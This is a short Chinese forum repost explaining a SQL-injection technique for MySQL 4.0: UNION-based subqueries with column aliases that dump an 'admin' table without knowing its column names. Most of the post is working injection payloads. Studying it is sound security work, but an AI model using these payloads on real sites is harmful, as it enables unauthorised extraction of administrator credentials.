Mysql 4.0利用子查询忽略字段名
BMa (安全技术爱好者!) | 2014-11-16 19:08
前段时间看了这篇帖子:
ACCESS利用子查询忽略字段名:http://zone.wooyun.org/content/15879
顿时毛瑟顿开,但是也没想在其他数据库中会不会有类似的场景
今天看了篇文章,关于Mysql4.0的类似方法,与大家分享一下!
原文如下:
由于mysql4是没有information_schema的,可以利用ACCESS类似的方法来利用子查询忽略字段名,
SELECT id,name FROM title where id = 1 union select 1,2 from (select * from admin order by 1)a
然后需要猜admin的列数
SELECT id,name FROM title where id = 1 union select 1,2 from (select * from admin order by 6)a
利用别名列查询出所有字段的子语句:
SELECT id,name FROM title where id = 1 and 1=2 union select a_3,a_4 from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from admin where 1=2 union select * from admin)a
对于mysql,还可以利用concat将所有一起显示:
SELECT id,name FROM title where id = 1 and 1=2 union select 1,concat(a_1,0x23,a_2,0x23,a_3,0x23,a_4,0x23,a_5,0x23,a_6) from (select 1 as a_1,2 as a_2,3 as a_3,4 as a_4,5 as a_5,6 as a_6 from admin where 1=2 union select * from admin)a
自此就可以得到对应的数据了!
原文地址:http://zone.wooyun.org/content/16576
文章来源于lcx.cc:Mysql 4.0利用子查询忽略字段名
相关推荐: 讨论:为什么如今的那么多手机客户端,比如说手机百度之类的,它们是如何盈利的
谁能解释一下为什么如今的那么多客户端(比如说手机百度之类的) 雅柏菲卡 (万物有灵,切忌污损。。。。。。) | 2014-03-20 17:27 会给比如说百度之类的互联网公司带来效益还是? [原文地址] 各种吐槽: 1# 小威 (呵呵复呵呵,女神敲回车!) …
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论